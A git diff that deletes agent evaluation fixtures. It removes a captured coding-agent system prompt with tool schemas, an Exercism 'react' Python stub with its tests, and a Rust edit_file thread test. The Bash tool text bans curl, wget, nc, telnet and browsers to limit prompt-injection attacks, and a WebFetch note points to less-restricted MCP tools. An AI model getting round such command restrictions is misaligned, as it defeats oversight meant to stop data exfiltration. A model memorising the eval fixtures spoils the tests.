example, before running \"mkdir foo/bar\", first use LS to check that \"foo\" exists and is the intended parent directory\n\n2. Security Check:\n - For security and to limit the threat of a prompt injection attack, some commands are limited or banned. If you use a disallowed command, you will receive an error message explaining the restriction. Explain the error to the User.\n - Verify that the command is not one of the banned commands: alias, curl, curlie, wget, axel, aria2c, nc, telnet, lynx, w3m, links, httpie, xh, http-prompt, chrome, firefox, safari.\n\n3. Command Execution:\n - After ensuring proper quoting, execute the command.\n - Capture the output of the command.\n\nUsage notes:\n - The command argument is required.\n - You can specify an optional timeout in milliseconds (up to 600000ms / 10 minutes). If not specified, commands will timeout after 30 minutes.\n - It is very helpful if you write a clear, concise description of what this command does in 5-10 words.\n - If the output exceeds 30000 characters, output will be truncated before being returned to you.\n - VERY IMPORTANT: You MUST avoid using search commands like `find` and `grep`. Instead use GrepTool, GlobTool, or dispatch_agent to search. You MUST avoid read tools like `cat`, `head`, `tail`, and `ls`, and use View and LS to read files.\n - When issuing multiple commands, use the ';' or '&&' operator to separate them. DO NOT use newlines (newlines are ok in quoted strings).\n - Try to maintain your current working directory throughout the session by using absolute paths and avoiding usage of `cd`. You may use `cd` if the User explicitly requests it.\n \n pytest /foo/bar/tests\n \n \n cd /foo/bar && pytest tests\n \n\n# Committing changes with git\n\nWhen the user asks you to create a new git commit, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel:\n - Run a git status command to see all untracked files.\n - Run a git diff command to see both staged and unstaged changes that will be committed.\n - Run a git log command to see recent commit messages, so that you can follow this repository's commit message style.\n\n2. Analyze all staged changes (both previously staged and newly added) and draft a commit message. Wrap your analysis process in tags:\n\n\n- List the files that have been changed or added\n- Summarize the nature of the changes (eg. new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 sentences) commit message that focuses on the \"why\" rather than the \"what\"\n- Ensure your language is clear, concise, and to the point\n- Ensure the message accurately reflects the changes and their purpose (i.e. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the message is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft message to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Add relevant untracked files to the staging area.\n - Create the commit with a message ending with:\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n - Run git status to make sure the commit succeeded.\n\n4. If the commit fails due to pre-commit hook changes, retry the commit ONCE to include these automated changes. If it fails again, it usually means a pre-commit hook is preventing the commit. If the commit succeeds but you notice that files were modified by the pre-commit hook, you MUST amend your commit to include them.\n\nImportant notes:\n- Use the git context at the start of this conversation to determine which files are relevant to your commit. Be careful not to stage and commit files (e.g. with `git add .`) that aren't relevant to your commit.\n- NEVER update the git config\n- DO NOT run additional commands to read or explore code, beyond what is available in the git context\n- DO NOT push to the remote repository\n- IMPORTANT: Never use git commands with the -i flag (like git rebase -i or git add -i) since they require interactive input which is not supported.\n- If there are no changes to commit (i.e., no untracked files and no modifications), do not create an empty commit\n- Ensure your commit message is meaningful and concise. It should explain the purpose of the changes, not just describe them.\n- Return an empty response - the user will see the git output directly\n- In order to ensure good formatting, ALWAYS pass the commit message via a HEREDOC, a la this example:\n\ngit commit -m \"$(cat <<'EOF'\n Commit message here.\n\n 🤖 Generated with [Claude Code](https://claude.ai/code)\n\n Co-Authored-By: Claude \n EOF\n )\"\n\n\n# Creating pull requests\nUse the gh command via the Bash tool for ALL GitHub-related tasks including working with issues, pull requests, checks, and releases. If given a Github URL use the gh command to get the information needed.\n\nIMPORTANT: When the user asks you to create a pull request, follow these steps carefully:\n\n1. Use BatchTool to run the following commands in parallel, in order to understand the current state of the branch since it diverged from the main branch:\n - Run a git status command to see all untracked files\n - Run a git diff command to see both staged and unstaged changes that will be committed\n - Check if the current branch tracks a remote branch and is up to date with the remote, so you know if you need to push to the remote\n - Run a git log command and `git diff main...HEAD` to understand the full commit history for the current branch (from the time it diverged from the `main` branch)\n\n2. Analyze all changes that will be included in the pull request, making sure to look at all relevant commits (NOT just the latest commit, but ALL commits that will be included in the pull request!!!), and draft a pull request summary. Wrap your analysis process in tags:\n\n\n- List the commits since diverging from the main branch\n- Summarize the nature of the changes (eg. new feature, enhancement to an existing feature, bug fix, refactoring, test, docs, etc.)\n- Brainstorm the purpose or motivation behind these changes\n- Assess the impact of these changes on the overall project\n- Do not use tools to explore code, beyond what is available in the git context\n- Check for any sensitive information that shouldn't be committed\n- Draft a concise (1-2 bullet points) pull request summary that focuses on the \"why\" rather than the \"what\"\n- Ensure the summary accurately reflects all changes since diverging from the main branch\n- Ensure your language is clear, concise, and to the point\n- Ensure the summary accurately reflects the changes and their purpose (ie. \"add\" means a wholly new feature, \"update\" means an enhancement to an existing feature, \"fix\" means a bug fix, etc.)\n- Ensure the summary is not generic (avoid words like \"Update\" or \"Fix\" without context)\n- Review the draft summary to ensure it accurately reflects the changes and their purpose\n\n\n3. Use BatchTool to run the following commands in parallel:\n - Create new branch if needed\n - Push to remote with -u flag if needed\n - Create PR using gh pr create with the format below. Use a HEREDOC to pass the body to ensure correct formatting.\n\ngh pr create --title \"the pr title\" --body \"$(cat <<'EOF'\n## Summary\n<1-3 bullet points>\n\n## Test plan\n[Checklist of TODOs for testing the pull request...]\n\n🤖 Generated with [Claude Code](https://claude.ai/code)\nEOF\n)\"\n\n\nImportant:\n- NEVER update the git config\n- Return an empty response - the user will see the gh output directly\n\n# Other common operations\n- View comments on a Github PR: gh api repos/foo/bar/pulls/123/comments\n---Tool: GlobTool\nArguments: pattern: string \"The glob pattern to match files against\", [optional] path: string \"The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided.\"\nUsage: - Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: GrepTool\nArguments: pattern: string \"The regular expression pattern to search for in file contents\", [optional] path: string \"The directory to search in. Defaults to the current working directory.\", [optional] include: string \"File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")\"\nUsage: \n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. \"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n\n---Tool: LS\nArguments: path: string \"The absolute path to the directory to list (must be absolute, not relative)\", [optional] ignore: array \"List of glob patterns to ignore\"\nUsage: Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.\n---Tool: View\nArguments: file_path: string \"The absolute path to the file to read\", [optional] offset: number \"The line number to start reading from. Only provide if the file is too large to read at once\", [optional] limit: number \"The number of lines to read. Only provide if the file is too large to read at once.\"\nUsage: Reads a file from the local filesystem. You can access any file directly by using this tool.\nAssume this tool is able to read all files on the machine. If the User provides a path to a file assume that path is valid. It is okay to read a file that does not exist; an error will be returned.\n\nUsage:\n- The file_path parameter must be an absolute path, not a relative path\n- By default, it reads up to 2000 lines starting from the beginning of the file\n- You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters\n- Any lines longer than 2000 characters will be truncated\n- Results are returned using cat -n format, with line numbers starting at 1\n- This tool allows Claude Code to VIEW images (eg PNG, JPG, etc). When reading an image file the contents are presented visually as Claude Code is a multimodal LLM.\n- For Jupyter notebooks (.ipynb files), use the ReadNotebook instead\n- When reading multiple files, you MUST use the BatchTool tool to read them all at once\n---Tool: Edit\nArguments: file_path: string \"The absolute path to the file to modify\", old_string: string \"The text to replace\", new_string: string \"The text to replace it with\", [optional] expected_replacements: number \"The expected number of replacements to perform. Defaults to 1 if not specified.\"\nUsage: This is a tool for editing files. For moving or renaming files, you should generally use the Bash tool with the 'mv' command instead. For larger edits, use the Write tool to overwrite files. For Jupyter notebooks (.ipynb files), use the NotebookEditCell instead.\n\nBefore using this tool:\n\n1. Use the View tool to understand the file's contents and context\n\n2. Verify the directory path is correct (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n\nTo make a file edit, provide the following:\n1. file_path: The absolute path to the file to modify (must be absolute, not relative)\n2. old_string: The text to replace (must match the file contents exactly, including all whitespace and indentation)\n3. new_string: The edited text to replace the old_string\n4. expected_replacements: The number of replacements you expect to make. Defaults to 1 if not specified.\n\nBy default, the tool will replace ONE occurrence of old_string with new_string in the specified file. If you want to replace multiple occurrences, provide the expected_replacements parameter with the exact number of occurrences you expect.\n\nCRITICAL REQUIREMENTS FOR USING THIS TOOL:\n\n1. UNIQUENESS (when expected_replacements is not specified): The old_string MUST uniquely identify the specific instance you want to change. This means:\n - Include AT LEAST 3-5 lines of context BEFORE the change point\n - Include AT LEAST 3-5 lines of context AFTER the change point\n - Include all whitespace, indentation, and surrounding code exactly as it appears in the file\n\n2. EXPECTED MATCHES: If you want to replace multiple instances:\n - Use the expected_replacements parameter with the exact number of occurrences you expect to replace\n - This will replace ALL occurrences of the old_string with the new_string\n - If the actual number of matches doesn't equal expected_replacements, the edit will fail\n - This is a safety feature to prevent unintended replacements\n\n3. VERIFICATION: Before using this tool:\n - Check how many instances of the target text exist in the file\n - If multiple instances exist, either:\n a) Gather enough context to uniquely identify each one and make separate calls, OR\n b) Use expected_replacements parameter with the exact count of instances you expect to replace\n\nWARNING: If you do not follow these requirements:\n - The tool will fail if old_string matches multiple locations and expected_replacements isn't specified\n - The tool will fail if the number of matches doesn't equal expected_replacements when it's specified\n - The tool will fail if old_string doesn't match exactly (including whitespace)\n - You may change unintended instances if you don't verify the match count\n\nWhen making edits:\n - Ensure the edit results in idiomatic, correct code\n - Do not leave the code in a broken state\n - Always use absolute file paths (starting with /)\n\nIf you want to create a new file, use:\n - A new file path, including dir name if needed\n - An empty old_string\n - The new file's contents as new_string\n\nRemember: when making multiple file edits in a row to the same file, you should prefer to send all edits in a single message with multiple calls to this tool, rather than multiple messages with a single call each.\n\n---Tool: Replace\nArguments: file_path: string \"The absolute path to the file to write (must be absolute, not relative)\", content: string \"The content to write to the file\"\nUsage: Write a file to the local filesystem. Overwrites the existing file if there is one.\n\nBefore using this tool:\n\n1. Use the ReadFile tool to understand the file's contents and context\n\n2. Directory Verification (only applicable when creating new files):\n - Use the LS tool to verify the parent directory exists and is the correct location\n---Tool: ReadNotebook\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to read (must be absolute, not relative)\"\nUsage: Reads a Jupyter notebook (.ipynb file) and returns all of the cells with their outputs. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path.\n---Tool: NotebookEditCell\nArguments: notebook_path: string \"The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)\", cell_number: number \"The index of the cell to edit (0-based)\", new_source: string \"The new source for the cell\", [optional] cell_type: string \"The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required.\", [optional] edit_mode: string \"The type of edit to make (replace, insert, delete). Defaults to replace.\"\nUsage: Completely replaces the contents of a specific cell in a Jupyter notebook (.ipynb file) with new source. Jupyter notebooks are interactive documents that combine code, text, and visualizations, commonly used for data analysis and scientific computing. The notebook_path parameter must be an absolute path, not a relative path. The cell_number is 0-indexed. Use edit_mode=insert to add a new cell at the index specified by cell_number. Use edit_mode=delete to delete the cell at the index specified by cell_number.\n---Tool: WebFetchTool\nArguments: url: string \"The URL to fetch content from\", prompt: string \"The prompt to run on the fetched content\"\nUsage: \n- Fetches content from a specified URL and processes it using an AI model\n- Takes a URL and a prompt as input\n- Fetches the URL content, converts HTML to markdown\n- Processes the content with the prompt using a small, fast model\n- Returns the model's response about the content\n- Use this tool when you need to retrieve and analyze web content\n\nUsage notes:\n - IMPORTANT: If an MCP-provided web fetch tool is available, prefer using that tool instead of this one, as it may have fewer restrictions. All MCP-provided tools start with \"mcp__\".\n - The URL must be a fully-formed valid URL\n - HTTP URLs will be automatically upgraded to HTTPS\n - For security reasons, the URL's domain must have been provided directly by the user, unless it's on a small pre-approved set of the top few dozen hosts for popular coding resources, like react.dev.\n - The prompt should describe what information you want to extract from the page\n - This tool is read-only and does not modify any files\n - Results may be summarized if the content is very large\n - Includes a self-cleaning 15-minute cache for faster responses when repeatedly accessing the same URL\n\n\nExample usage:\n{\n \"invocations\": [\n {\n \"tool_name\": \"Bash\",\n \"input\": {\n \"command\": \"git blame src/foo.ts\"\n }\n },\n {\n \"tool_name\": \"GlobTool\",\n \"input\": {\n \"pattern\": \"**/*.ts\"\n }\n },\n {\n \"tool_name\": \"GrepTool\",\n \"input\": {\n \"pattern\": \"function\",\n \"include\": \"*.ts\"\n }\n }\n ]\n}\n", - "inputSchema": { - "type": "object", - "properties": { - "description": { - "type": "string", - "description": "A short (3-5 word) description of the batch operation" - }, - "invocations": { - "type": "array", - "items": { - "type": "object", - "properties": { - "tool_name": { - "type": "string", - "description": "The name of the tool to invoke" - }, - "input": { - "type": "object", - "additionalProperties": {}, - "description": "The input to pass to the tool" - } - }, - "required": [ - "tool_name", - "input" - ], - "additionalProperties": false - }, - "description": "The list of tool invocations to execute" - } - }, - "required": [ - "description", - "invocations" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "GlobTool", - "description": "- Fast file pattern matching tool that works with any codebase size\n- Supports glob patterns like \"**/*.js\" or \"src/**/*.ts\"\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files by name patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", - "inputSchema": { - "type": "object", - "properties": { - "pattern": { - "type": "string", - "description": "The glob pattern to match files against" - }, - "path": { - "type": "string", - "description": "The directory to search in. If not specified, the current working directory will be used. IMPORTANT: Omit this field to use the default directory. DO NOT enter \"undefined\" or \"null\" - simply omit it for the default behavior. Must be a valid directory path if provided." - } - }, - "required": [ - "pattern" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "GrepTool", - "description": "\n- Fast content search tool that works with any codebase size\n- Searches file contents using regular expressions\n- Supports full regex syntax (eg. \"log.*Error\", \"function\\s+\\w+\", etc.)\n- Filter files by pattern with the include parameter (eg. \"*.js\", \"*.{ts,tsx}\")\n- Returns matching file paths sorted by modification time\n- Use this tool when you need to find files containing specific patterns\n- When you are doing an open ended search that may require multiple rounds of globbing and grepping, use the Agent tool instead\n", - "inputSchema": { - "type": "object", - "properties": { - "pattern": { - "type": "string", - "description": "The regular expression pattern to search for in file contents" - }, - "path": { - "type": "string", - "description": "The directory to search in. Defaults to the current working directory." - }, - "include": { - "type": "string", - "description": "File pattern to include in the search (e.g. \"*.js\", \"*.{ts,tsx}\")" - } - }, - "required": [ - "pattern" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "LS", - "description": "Lists files and directories in a given path. The path parameter must be an absolute path, not a relative path. You can optionally provide an array of glob patterns to ignore with the ignore parameter. You should generally prefer the Glob and Grep tools, if you know which directories to search.", - "inputSchema": { - "type": "object", - "properties": { - "path": { - "type": "string", - "description": "The absolute path to the directory to list (must be absolute, not relative)" - }, - "ignore": { - "type": "array", - "items": { - "type": "string" - }, - "description": "List of glob patterns to ignore" - } - }, - "required": [ - "path" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "View", - "description": "Read a file from the local filesystem.", - "inputSchema": { - "type": "object", - "properties": { - "file_path": { - "type": "string", - "description": "The absolute path to the file to read" - }, - "offset": { - "type": "number", - "description": "The line number to start reading from. Only provide if the file is too large to read at once" - }, - "limit": { - "type": "number", - "description": "The number of lines to read. Only provide if the file is too large to read at once." - } - }, - "required": [ - "file_path" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "Edit", - "description": "A tool for editing files", - "inputSchema": { - "type": "object", - "properties": { - "file_path": { - "type": "string", - "description": "The absolute path to the file to modify" - }, - "old_string": { - "type": "string", - "description": "The text to replace" - }, - "new_string": { - "type": "string", - "description": "The text to replace it with" - }, - "expected_replacements": { - "type": "number", - "default": 1, - "description": "The expected number of replacements to perform. Defaults to 1 if not specified." - } - }, - "required": [ - "file_path", - "old_string", - "new_string" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "Replace", - "description": "Write a file to the local filesystem.", - "inputSchema": { - "type": "object", - "properties": { - "file_path": { - "type": "string", - "description": "The absolute path to the file to write (must be absolute, not relative)" - }, - "content": { - "type": "string", - "description": "The content to write to the file" - } - }, - "required": [ - "file_path", - "content" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "ReadNotebook", - "description": "Extract and read source code from all code cells in a Jupyter notebook.", - "inputSchema": { - "type": "object", - "properties": { - "notebook_path": { - "type": "string", - "description": "The absolute path to the Jupyter notebook file to read (must be absolute, not relative)" - } - }, - "required": [ - "notebook_path" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "NotebookEditCell", - "description": "Replace the contents of a specific cell in a Jupyter notebook.", - "inputSchema": { - "type": "object", - "properties": { - "notebook_path": { - "type": "string", - "description": "The absolute path to the Jupyter notebook file to edit (must be absolute, not relative)" - }, - "cell_number": { - "type": "number", - "description": "The index of the cell to edit (0-based)" - }, - "new_source": { - "type": "string", - "description": "The new source for the cell" - }, - "cell_type": { - "type": "string", - "enum": [ - "code", - "markdown" - ], - "description": "The type of the cell (code or markdown). If not specified, it defaults to the current cell type. If using edit_mode=insert, this is required." - }, - "edit_mode": { - "type": "string", - "description": "The type of edit to make (replace, insert, delete). Defaults to replace." - } - }, - "required": [ - "notebook_path", - "cell_number", - "new_source" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "WebFetchTool", - "description": "Claude wants to fetch content from this URL", - "inputSchema": { - "type": "object", - "properties": { - "url": { - "type": "string", - "format": "uri", - "description": "The URL to fetch content from" - }, - "prompt": { - "type": "string", - "description": "The prompt to run on the fetched content" - } - }, - "required": [ - "url", - "prompt" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - } - ] - } -} -``` diff --git a/crates/agent/src/edit_agent/evals/fixtures/zode/react.py b/crates/agent/src/edit_agent/evals/fixtures/zode/react.py deleted file mode 100644 index 03ff02e7891449..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/zode/react.py +++ /dev/null @@ -1,14 +0,0 @@ -class InputCell: - def __init__(self, initial_value): - self.value = None - - -class ComputeCell: - def __init__(self, inputs, compute_function): - self.value = None - - def add_callback(self, callback): - pass - - def remove_callback(self, callback): - pass diff --git a/crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py b/crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py deleted file mode 100644 index 1f917e40b4167e..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py +++ /dev/null @@ -1,271 +0,0 @@ -# These tests are auto-generated with test data from: -# https://github.com/exercism/problem-specifications/tree/main/exercises/react/canonical-data.json -# File last updated on 2023-07-19 - -from functools import partial -import unittest - -from react import ( - InputCell, - ComputeCell, -) - - -class ReactTest(unittest.TestCase): - def test_input_cells_have_a_value(self): - input = InputCell(10) - self.assertEqual(input.value, 10) - - def test_an_input_cell_s_value_can_be_set(self): - input = InputCell(4) - input.value = 20 - self.assertEqual(input.value, 20) - - def test_compute_cells_calculate_initial_value(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - self.assertEqual(output.value, 2) - - def test_compute_cells_take_inputs_in_the_right_order(self): - one = InputCell(1) - two = InputCell(2) - output = ComputeCell( - [ - one, - two, - ], - lambda inputs: inputs[0] + inputs[1] * 10, - ) - self.assertEqual(output.value, 21) - - def test_compute_cells_update_value_when_dependencies_are_changed(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - input.value = 3 - self.assertEqual(output.value, 4) - - def test_compute_cells_can_depend_on_other_compute_cells(self): - input = InputCell(1) - times_two = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] * 2, - ) - times_thirty = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] * 30, - ) - output = ComputeCell( - [ - times_two, - times_thirty, - ], - lambda inputs: inputs[0] + inputs[1], - ) - self.assertEqual(output.value, 32) - input.value = 3 - self.assertEqual(output.value, 96) - - def test_compute_cells_fire_callbacks(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 3 - self.assertEqual(cb1_observer[-1], 4) - - def test_callback_cells_only_fire_on_change(self): - input = InputCell(1) - output = ComputeCell([input], lambda inputs: 111 if inputs[0] < 3 else 222) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer, []) - input.value = 4 - self.assertEqual(cb1_observer[-1], 222) - - def test_callbacks_do_not_report_already_reported_values(self): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer[-1], 3) - input.value = 3 - self.assertEqual(cb1_observer[-1], 4) - - def test_callbacks_can_fire_from_multiple_cells(self): - input = InputCell(1) - plus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - minus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] - 1, - ) - cb1_observer = [] - cb2_observer = [] - callback1 = self.callback_factory(cb1_observer) - callback2 = self.callback_factory(cb2_observer) - plus_one.add_callback(callback1) - minus_one.add_callback(callback2) - input.value = 10 - self.assertEqual(cb1_observer[-1], 11) - self.assertEqual(cb2_observer[-1], 9) - - def test_callbacks_can_be_added_and_removed(self): - input = InputCell(11) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - cb2_observer = [] - cb3_observer = [] - callback1 = self.callback_factory(cb1_observer) - callback2 = self.callback_factory(cb2_observer) - callback3 = self.callback_factory(cb3_observer) - output.add_callback(callback1) - output.add_callback(callback2) - input.value = 31 - self.assertEqual(cb1_observer[-1], 32) - self.assertEqual(cb2_observer[-1], 32) - output.remove_callback(callback1) - output.add_callback(callback3) - input.value = 41 - self.assertEqual(len(cb1_observer), 1) - self.assertEqual(cb2_observer[-1], 42) - self.assertEqual(cb3_observer[-1], 42) - - def test_removing_a_callback_multiple_times_doesn_t_interfere_with_other_callbacks( - self, - ): - input = InputCell(1) - output = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - cb1_observer = [] - cb2_observer = [] - callback1 = self.callback_factory(cb1_observer) - callback2 = self.callback_factory(cb2_observer) - output.add_callback(callback1) - output.add_callback(callback2) - output.remove_callback(callback1) - output.remove_callback(callback1) - output.remove_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer, []) - self.assertEqual(cb2_observer[-1], 3) - - def test_callbacks_should_only_be_called_once_even_if_multiple_dependencies_change( - self, - ): - input = InputCell(1) - plus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - minus_one1 = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] - 1, - ) - minus_one2 = ComputeCell( - [ - minus_one1, - ], - lambda inputs: inputs[0] - 1, - ) - output = ComputeCell( - [ - plus_one, - minus_one2, - ], - lambda inputs: inputs[0] * inputs[1], - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - output.add_callback(callback1) - input.value = 4 - self.assertEqual(cb1_observer[-1], 10) - - def test_callbacks_should_not_be_called_if_dependencies_change_but_output_value_doesn_t_change( - self, - ): - input = InputCell(1) - plus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] + 1, - ) - minus_one = ComputeCell( - [ - input, - ], - lambda inputs: inputs[0] - 1, - ) - always_two = ComputeCell( - [ - plus_one, - minus_one, - ], - lambda inputs: inputs[0] - inputs[1], - ) - cb1_observer = [] - callback1 = self.callback_factory(cb1_observer) - always_two.add_callback(callback1) - input.value = 2 - self.assertEqual(cb1_observer, []) - input.value = 3 - self.assertEqual(cb1_observer, []) - input.value = 4 - self.assertEqual(cb1_observer, []) - input.value = 5 - self.assertEqual(cb1_observer, []) - - # Utility functions. - def callback_factory(self, observer): - def callback(observer, value): - observer.append(value) - - return partial(callback, observer) diff --git a/crates/agent/src/tests/edit_file_thread_test.rs b/crates/agent/src/tests/edit_file_thread_test.rs deleted file mode 100644 index 7e6d131c98fca2..00000000000000 --- a/crates/agent/src/tests/edit_file_thread_test.rs +++ /dev/null @@ -1,407 +0,0 @@ -use super::*; -use crate::{AgentTool, EditFileTool, ReadFileTool}; -use acp_thread::UserMessageId; -use fs::FakeFs; -use language_model::{ - LanguageModelCompletionEvent, LanguageModelToolUse, StopReason, - fake_provider::FakeLanguageModel, -}; -use prompt_store::ProjectContext; -use serde_json::json; -use std::{sync::Arc, time::Duration}; -use util::path; - -#[gpui::test] -async fn test_edit_file_tool_in_thread_context(cx: &mut TestAppContext) { - // This test verifies that the edit_file tool works correctly when invoked - // through the full thread flow (model sends ToolUse event -> tool runs -> result sent back). - // This is different from tests that call tool.run() directly. - super::init_test(cx); - super::always_allow_tools(cx); - - let fs = FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/project"), - json!({ - "src": { - "main.rs": "fn main() {\n println!(\"Hello, world!\");\n}\n" - } - }), - ) - .await; - - let project = project::Project::test(fs.clone(), [path!("/project").as_ref()], cx).await; - let project_context = cx.new(|_cx| ProjectContext::default()); - let context_server_store = project.read_with(cx, |project, _| project.context_server_store()); - let context_server_registry = - cx.new(|cx| crate::ContextServerRegistry::new(context_server_store.clone(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let fake_model = model.as_fake(); - - let thread = cx.new(|cx| { - let mut thread = crate::Thread::new( - project.clone(), - project_context, - context_server_registry, - crate::Templates::new(), - Some(model.clone()), - cx, - ); - // Add just the tools we need for this test - let language_registry = project.read(cx).languages().clone(); - thread.add_tool(crate::ReadFileTool::new( - project.clone(), - thread.action_log().clone(), - true, - )); - thread.add_tool(crate::EditFileTool::new( - project.clone(), - cx.weak_entity(), - language_registry, - crate::Templates::new(), - )); - thread - }); - - // First, read the file so the thread knows about its contents - let _events = thread - .update(cx, |thread, cx| { - thread.send(UserMessageId::new(), ["Read the file src/main.rs"], cx) - }) - .unwrap(); - cx.run_until_parked(); - - // Model calls read_file tool - let read_tool_use = LanguageModelToolUse { - id: "read_tool_1".into(), - name: ReadFileTool::NAME.into(), - raw_input: json!({"path": "project/src/main.rs"}).to_string(), - input: json!({"path": "project/src/main.rs"}), - is_input_complete: true, - thought_signature: None, - }; - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(read_tool_use)); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // Wait for the read tool to complete and model to be called again - while fake_model.pending_completions().is_empty() { - cx.run_until_parked(); - } - - // Model responds after seeing the file content, then calls edit_file - fake_model.send_last_completion_stream_text_chunk("I'll edit the file now."); - let edit_tool_use = LanguageModelToolUse { - id: "edit_tool_1".into(), - name: EditFileTool::NAME.into(), - raw_input: json!({ - "display_description": "Change greeting message", - "path": "project/src/main.rs", - "mode": "edit" - }) - .to_string(), - input: json!({ - "display_description": "Change greeting message", - "path": "project/src/main.rs", - "mode": "edit" - }), - is_input_complete: true, - thought_signature: None, - }; - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(edit_tool_use)); - fake_model - .send_last_completion_stream_event(LanguageModelCompletionEvent::Stop(StopReason::ToolUse)); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // The edit_file tool creates an EditAgent which makes its own model request. - // We need to respond to that request with the edit instructions. - // Wait for the edit agent's completion request - let deadline = std::time::Instant::now() + Duration::from_secs(5); - while fake_model.pending_completions().is_empty() { - if std::time::Instant::now() >= deadline { - panic!( - "Timed out waiting for edit agent completion request. Pending: {}", - fake_model.pending_completions().len() - ); - } - cx.run_until_parked(); - cx.background_executor - .timer(Duration::from_millis(10)) - .await; - } - - // Send the edit agent's response with the XML format it expects - let edit_response = "println!(\"Hello, world!\");\nprintln!(\"Hello, Zed!\");"; - fake_model.send_last_completion_stream_text_chunk(edit_response); - fake_model.end_last_completion_stream(); - cx.run_until_parked(); - - // Wait for the edit to complete and the thread to call the model again with tool results - let deadline = std::time::Instant::now() + Duration::from_secs(5); - while fake_model.pending_completions().is_empty() { - if std::time::Instant::now() >= deadline { - panic!("Timed out waiting for model to be called after edit completion"); - } - cx.run_until_parked(); - cx.background_executor - .timer(Duration::from_millis(10)) - .await; - } - - // Verify the file was edited - let file_content = fs - .load(path!("/project/src/main.rs").as_ref()) - .await - .expect("file should exist"); - 